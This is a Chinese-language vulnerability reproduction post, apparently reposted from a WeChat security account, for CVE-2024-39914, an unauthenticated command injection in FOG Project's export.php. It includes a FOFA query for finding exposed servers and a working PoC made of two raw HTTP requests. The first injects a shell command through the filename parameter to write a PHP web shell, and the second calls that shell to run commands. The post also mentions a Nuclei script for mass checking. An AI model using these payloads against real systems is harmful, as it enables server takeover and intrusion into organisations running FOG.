FOG Project 文件名命令注入漏洞复现（CVE-2024-39914）

admin

138359
文章

113
评论

2024年7月19日17:03:30评论207 views字数 852阅读2分50秒阅读模式

0x02

产品介绍

FOG是一个开源的计算机镜像解决方案，旨在帮助管理员轻松地部署、维护和克隆大量计算机。FOG Project 提供了一套功能强大的工具，使用户能够快速部署操作系统、软件和配置设置到多台计算机上，从而节省时间和精力。该项目支持基于网络的 PXE 启动、镜像创建和还原、硬件和软件清单管理、远程控制和监视等功能，为 IT 管理员和系统管理员提供了一个全面的工具集。

0x03

漏洞威胁

该漏洞在FOGPROJECT中的packages/web/lib/fog/reportmaker.class.php文件受到命令注入漏洞的影响，该漏洞存在于/fog/management/export.php的filename参数，未经身份验证的远程攻击者可利用此漏洞执行任意命令，获取服务器权限。

影响范围：

FOGPROJECT < 1.5.10.34

0x04

漏洞环境

FOFA:

body="FOG Project"

FOG Project 文件名命令注入漏洞复现（CVE-2024-39914）

0x05

漏洞复现

PoC

POST /fog/management/export.php?filename=$(echo+''+>+rcefsdfsd32.php)&type=pdf HTTP/1.1Host: User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.0.0 Safari/537.36Connection: closeContent-Type: application/x-www-form-urlencoded; charset=UTF-8fogguiuser=fog&nojson=2

RCE

POST /fog/management/rcefsdfsd32.php?cmd=id HTTP/1.1Host:

FOG Project 文件名命令注入漏洞复现（CVE-2024-39914）

0x06

批量脚本验证

Nuclei验证脚本已发布

原文始发于微信公众号（冷漠安全）：「漏洞复现」FOG Project 文件名命令注入漏洞复现（CVE-2024-39914）

免责声明:文章中涉及的程序(方法)可能带有攻击性，仅供安全研究与教学之用，读者将其信息做其他用途，由读者承担全部法律及连带责任，本站不承担任何法律及连带责任；如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截，联系方式见首页)，望知悉。

左青龙
微信扫一扫

右白虎
微信扫一扫

FOG Project 文件名命令注入漏洞复现（CVE-2024-39914）

Zyxel-NBG2105-身份验证绕过（CVE-2021-3297）

Zyxel-NBG2105-身份验证绕过-CVE-2021-3297

H3C多系列路由器存在任意用户登录漏洞 POC

Vite 任意文件读取漏洞 (CVE-2025-32395)

Vite 任意文件读取系列漏洞(附POC)

YesWiki知识库edit接口存在任意文件读取漏洞附POC

Vite vite-project接口存在任意文件读取漏洞CNNVD-202504-684 附POC

Windows远程桌面服务漏洞可远程执行恶意代码

三汇SMG网关管理软件远程代码执行漏洞

CVE-2025-1974｜Kubernetes Ingress NGINX 中存在严重 RCE 漏洞

发表评论

在线咨询

微信